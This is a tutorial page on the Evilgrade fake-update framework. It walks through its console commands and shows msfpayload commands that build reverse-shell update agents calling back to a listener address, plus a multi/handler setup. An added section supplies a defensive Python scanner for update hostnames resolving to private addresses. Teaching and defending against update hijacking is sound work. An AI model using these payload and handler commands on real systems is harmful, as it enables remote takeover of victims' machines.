# Hacking with Evilgrade

{% hint style="info" %}
**2022 NHN Cloud** <mark style="color:red;">**free**</mark> **training schedule**: <https://doc.skill.or.kr/2022-NHN-Cloud-Education>
{% endhint %}

## Title : Hacking with Evilgrade

{% hint style="danger" %}
**Note: Please be aware that the user of the program is responsible for any problems arising from use for purposes other than testing.**

**Disclaimer: I am not responsible for any damage done using this tool. This tool should only be used for educational purposes and for penetration testing.**
{% endhint %}

### Contents :

> This is a demonstration video of the Evilgrade tool. It is a DNS traffic manipulation tool.

### Description :

> Evilgrade is a modular framework that allows the user to take advantage of poor upgrade implementations by injecting fake updates. It comes with pre-made binaries (agents), a working default configuration for fast pentests, and has its own WebServer and DNSServer modules. It is easy to set up new settings, and it has autoconfiguration when new binary agents are set.

Information :

> #### Commands
>
> **configure / conf - Configure**
>
> **Example #1**
>
> ```
> evilgrade>configure sunjava
> evilgrade(sunjava)>
>
> evilgrade>conf sunjava
> evilgrade(sunjava)>
>
> ## 'conf' takes us back to the global configuration
> evilgrade(sunjava)>conf
> evilgrade>
>
>
> ##
> reload    - Reload to get all modules update (to refresh loaded modules, useful on development)
> start     - Start webserver
> stop      - Stop webserver (fake update server)
> ```
>
> **Example #2**
>
> ```
> evilgrade>start
> evilgrade>
> [28/10/2010:21:35:55] - [WEBSERVER] - Webserver ready. Waiting for connections ...
> evilgrade>
> [28/10/2010:21:35:55] - [DNSSERVER] - DNS Server Ready. Waiting for Connections ...
>
>
> #######################################
>
>
>
> Example:
> -------
> evilgrade>stop
> Stopping WEBSERVER  [OK]
> Stopping DNSSERVER  [OK]
>
> #######################################
>
> restart   - Restart services (WebServer and DNS Server)
> stops and starts again
>
> #######################################
>
> status    - Get webserver and victims status
>
> Example:
> -------
> evilgrade>show status
> Webserver (pid 4134) already running
>
> Users status:
> ============
>
> .---------------------------------------------------------------------------------------------------------------.
> | Client         | Module           | Status | Md5,Cmd,File                                                     |
> +----------------+------------------+--------+------------------------------------------------------------------+
> | 192.168.233.10 | modules::sunjava | send   | d9a28baa883ecf51e41fc626e1d4eed5,'',"./agent/reverseshell.exe"   |
> '----------------+------------------+--------+------------------------------------------------------------------'
>
> #######################################
>
> show      - Display information of <object>.
>
> #######################################
>
> show active    - Display active modules in the webserver
>
> #######################################
>
> show modules    - Display implemented modules
>
> #########################################
>
> show options    - Display modules/global options
>
> Example:
> -------
>
> evilgrade>show options
>
> Display options:
> ===============
>
> .-----------------------------------------------------------------------------------.
> | Name        | Default   | Description                                             |
> +-------------+-----------+---------------------------------------------------------+
> | DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
> | DNSPort     |        53 | Listen Name Server port                                 |
> | debug       |         1 | Debug mode                                              |
> | port        |        80 | Webserver listening port                                |
> | sslport     |       443 | Webserver SSL listening port                            |
> '-------------+-----------+---------------------------------------------------------'
>
> evilgrade>
> evilgrade(notepadplus)>conf vmware
> evilgrade(vmware)>show options (without started services)
>
> Display options:
> ===============
>
> Name = VMware Server
> Version = 1.0
> Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
> Description = ""
> VirtualHost = "www.vmware.com"
>
> .----------------------------------------------.
> | Name   | Default           | Description     |
> +--------+-------------------+-----------------+
> | enable |                 1 | Status          |
> | agent  | ./agent/agent.exe | Agent to inject |
> '--------+-------------------+-----------------'
>
> evilgrade(vmware)>show options (with started services after setting agent)
>
> Display options:
> ===============
>
> Name = VMware Server
> Version = 1.0
> Author = ["Francisco Amato < famato +[AT]+ faradaysec.com>"]
> Description = ""
> VirtualHost = "www.vmware.com"
>
> .--------------------------------------------------------------------------------------------------.
> | Name        | Default                                                          | Description     |
> +-------------+------------------------------------------------------------------+-----------------+
> | enable      |                                                                1 | Status          |
> | agentmd5    | f80af637642170507bda998b6f2015fa                                 |                 |
> | agentsize   |                                                            54576 |                 |
> | agent       | ./agent/agent.exe                                                | Agent to inject |
> | agentsha256 | 44f4e3f65f6ca375df4e0247fa0ee1efedbe2965a1c35e910d8d035ec61b76bd |                 |
> '-------------+------------------------------------------------------------------+-----------------'
>
>
> #########################################
>
> set       - Configure variables global or modules
>
> Example:
> -------
>
> evilgrade>show options
>
>
> Display options:
> ===============
>
> .-----------------------------------------------------------------------------------.
> | Name        | Default   | Description                                             |
> +-------------+-----------+---------------------------------------------------------+
> | DNSEnable   |         1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 127.0.0.1 | Resolve VHost to ip  )                                  |
> | DNSPort     |        53 | Listen Name Server port                                 |
> | debug       |         0 | Debug mode                                              |
> | port        |        80 | Webserver listening port                                |
> | sslport     |       443 | Webserver SSL listening port                            |
> '-------------+-----------+---------------------------------------------------------'
>
> ###Let's enable DEBUG option and set as DNSAnswerIp our Inet address (192.168.1.4)
>
> evilgrade>set debug 1 #Enable debug
> set debug, 1
>
> evilgrade>set DNSAnswerIp 192.168.1.4 #Ip where evilgrade's DNS Server is listening
> set DNSAnswerIp, 192.168.1.4
>
> evilgrade>show options
>
> Display options:
> ===============
>
> .-------------------------------------------------------------------------------------.
> | Name        | Default     | Description                                             |
> +-------------+-------------+---------------------------------------------------------+
> | DNSEnable   |           1 | Enable DNS Server ( handle virtual request on modules ) |
> | DNSAnswerIp | 192.168.1.4 | Resolve VHost to ip  )                                  |
> | DNSPort     |          53 | Listen Name Server port                                 |
> | debug       |           1 | Debug mode                                              |
> | port        |          80 | Webserver listening port                                |
> | sslport     |         443 | Webserver SSL listening port                            |
> '-------------+-------------+---------------------------------------------------------'
>
>
> ###############################
>
> exit      - exits the program
>
> #######################################
>
> help      - prints this screen, or help on 'command'
>
> #######################################
> ```
>
> **Advanced**
>
> * Modules Options: Each module has special options, but the "agent" field is always present. The agent is our fake update binary, we have to set the path to where it's located or implement a dynamic fake update binary generation.
>
> **Example #1-1**
>
> ```
> evilgrade(sunjava)>set agent '["/metasploit/msfpayload windows/shell_reverse_tcp LHOST=192.168.233.2 LPORT=4141 X > <%OUT%>/tmp/a.exe<%OUT%>"]'
> ```
>
> In this case, for every required update binary we generate a fake update binary with the payload "windows/shell\_reverse\_tcp", using a reverse shell to connect to address 192.168.233.2 port 4141. The label `<%OUT%>...<%OUT%>` is a special tag to detect where the output binary is going to be generated. Evilgrade detects the usage of the "dynamic fake update binary" feature by the value being a sentence between square brackets `[]`. Inside those brackets we have a string that is also enclosed in `""` and is compiled using Perl.
>
> For example if we use:
>
> ```
> evilgrade(sunjava)>set agent '["./generatebin -o <%OUT%>/tmp/update".int(rand(256)).".exe<%OUT%>"]'
> ```
>
> then every time we get a binary request, evilgrade will compile the line and execute the final string "./generatebin -o /tmp/update(random).exe" generating different agents.
>
> An easy, but not dynamic, alternative could be to generate the payload directly from msfpayload on a terminal and assign it manually to the configuration of the module.
>
> **Example #1-2**
>
> (Outside evilgrade)
>
> ```
> [team@faraday]$ msfpayload windows/meterpreter/reverse_ord_tcp LHOST=192.168.100.2 LPORT=4444 X > /tmp/reverse-shell.exe
> ```
>
> (Inside evilgrade)
>
> ```
> evilgrade(sunjava)>set agent /tmp/reverse-shell.exe
> ```
>
> After our payload has been generated, we leave a multi/handler listening on the previously assigned LHOST.
>
> (Outside evilgrade)
>
> ```
> [team@faraday]$ msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.100.2 LPORT=4444 E
> [*] Started reverse handler on 192.168.100.2:4444
> [*] Starting the payload handler...
> ```
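
The `show options` output above lists `DNSAnswerIp` (127.0.0.1 by default, 192.168.1.4 in the `set` example) as the address the tool's DNS server returns for a module's `VirtualHost` such as www.vmware.com. From the defender's side, that step is observable: a public vendor update hostname should never resolve into loopback, link-local or RFC 1918 space. The Python below is an added example, not part of the original page or the Evilgrade project; it scans resolver log lines for watched update hostnames and raises an alert on such answers. The log line format, the sample lines and the watched-host list are constructed for this example.

```python
"""Flag update-server hostnames that resolve to addresses they should never have.

Added example, not from the Evilgrade project or the original page. Watches a
set of vendor update hostnames in resolver log lines and raises an alert when
one of them resolves to loopback, link-local or private address space.
The log format, sample lines and watched-host list are constructed here.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional

# www.vmware.com is the VirtualHost shown in the page's `show options` output;
# in a real deployment this set would list the update hosts of installed software.
WATCHED_UPDATE_HOSTS = {"www.vmware.com"}

# Ranges that a public vendor update host should never resolve into.
BLOCKED_RANGES = [
    (ipaddress.ip_network("127.0.0.0/8"), "loopback"),
    (ipaddress.ip_network("::1/128"), "loopback"),
    (ipaddress.ip_network("10.0.0.0/8"), "RFC 1918 private"),
    (ipaddress.ip_network("172.16.0.0/12"), "RFC 1918 private"),
    (ipaddress.ip_network("192.168.0.0/16"), "RFC 1918 private"),
    (ipaddress.ip_network("fc00::/7"), "IPv6 unique-local"),
    (ipaddress.ip_network("169.254.0.0/16"), "link-local"),
    (ipaddress.ip_network("fe80::/10"), "link-local"),
]

# Assumed resolver log format: "<timestamp> query <qname> A -> <answer ip>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+query\s+(?P<qname>\S+)\s+A\s+->\s+(?P<ip>\S+)$")


@dataclass(frozen=True)
class Alert:
    ts: str
    qname: str
    ip: str
    reason: str


def is_suspicious_answer(ip_text: str) -> Optional[str]:
    """Return why an answer is unacceptable for an update host, or None if it is fine."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return "unparseable address"
    for net, label in BLOCKED_RANGES:
        if ip in net:  # membership is False when IPv4/IPv6 versions differ
            return f"{label} address for an Internet update host"
    return None


def scan_dns_log(lines) -> List[Alert]:
    """Parse log lines and return one Alert per suspicious answer for a watched host."""
    alerts: List[Alert] = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unrelated or malformed line
        qname = m.group("qname").rstrip(".").lower()
        if qname not in WATCHED_UPDATE_HOSTS:
            continue  # internal names legitimately resolve to private space
        reason = is_suspicious_answer(m.group("ip"))
        if reason is not None:
            alerts.append(Alert(m.group("ts"), qname, m.group("ip"), reason))
    return alerts


# Constructed sample: one benign answer (TEST-NET documentation address), the
# tool's default DNSAnswerIp, an internal host that must not alert, and the
# DNSAnswerIp value from the page's `set` example.
SAMPLE_LOG = [
    "2022-05-01T10:00:01Z query www.vmware.com. A -> 203.0.113.10",
    "2022-05-01T10:05:12Z query www.vmware.com. A -> 127.0.0.1",
    "2022-05-01T10:05:40Z query intranet.example.internal. A -> 192.168.1.20",
    "2022-05-01T10:06:03Z query www.vmware.com. A -> 192.168.1.4",
    "this line is malformed and must be skipped",
]

if __name__ == "__main__":
    for a in scan_dns_log(SAMPLE_LOG):
        print(f"{a.ts} {a.qname} -> {a.ip}: {a.reason}")
```

Run as a script it prints two alerts, one for each answer that matches the tool's `DNSAnswerIp` values shown on the page; the internal hostname resolving to 192.168.1.20 is skipped because only the watched update hosts are scoped. In practice the watched-host set would come from the update endpoints of the software actually installed, and the same check can be fed from a resolver's query log or a passive DNS sensor. A host resolving to a public address is not proof of a clean update path: the modules above serve over plain HTTP on port 80, and the autoconfiguration that fills `agentmd5` and `agentsha256` for whatever agent is set shows why a hash delivered beside the binary on the same channel is not a defence. Update clients need to verify a signature rooted in a key pinned in the client itself.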

{% embed url="<https://youtu.be/nReKwL93Fnk>" %}
Demo video
{% endembed %}


